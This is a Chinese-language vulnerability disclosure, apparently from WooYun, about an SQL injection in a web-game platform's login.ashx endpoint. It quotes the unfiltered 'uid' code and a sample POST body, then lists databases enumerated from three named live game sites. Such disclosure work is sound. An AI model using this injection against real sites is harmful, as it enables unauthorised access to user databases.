信游科技页游平台程序通用型SQL注入第二发

### 简要描述： 上一发SQL注入： http://www.wooyun.org/bugs/wooyun-2010-048510 现在好晚了2点了，该睡了……明天再来 ### 详细说明： 官网案例 http://52xinyou.cn/anli.htm 下面测试了3个案例表明他的通用性……要不怕@xsser 姐姐不相信啊 ### 漏洞证明： http://www.12wan.com/api/sys/login.ashx ``` var uid = _form_["uid"]; //uid未过滤 var pwd = _form_["pwd"]; var rem = _form_["rem"]; if (uid=="") { context.Response.Write("请输入用户名"); return; } if (pwd == "") { context.Response.Write("请输入密码"); return; } DataManage.UserEng ueng = new DataManage.UserEng(); var t = ueng.Login(uid, pwd, rem.ToLower() == "true"); //带入到login函数中 ``` POST数据： uid=a&pwd=a&rem=false [<img src="https://images.seebug.org/upload/201401/11020716bb6aa8da3b493a66d7083acf527f0f22.png" alt="image023.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/11020716bb6aa8da3b493a66d7083acf527f0f22.png) available databases [10]: [*] bbs [*] cd2 [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] v32 [*] xy003 再换一个目标： http://www.515you.com/api/sys/login.ashx [<img src="https://images.seebug.org/upload/201401/1102074289e3f8b367a8bcec856f06200988fa67.png" alt="image025.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1102074289e3f8b367a8bcec856f06200988fa67.png) available databases [9]: [*] Apw [*] bbs [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] xykj 再上一个： http://www.526game.com/api/sys/login.aspx [<img src="https://images.seebug.org/upload/201401/11020809007e7429f461439aadc51687dbf9c4ac.png" alt="image027.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/11020809007e7429f461439aadc51687dbf9c4ac.png) available databases [7]: [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] xy003 其它例子不再去测试了。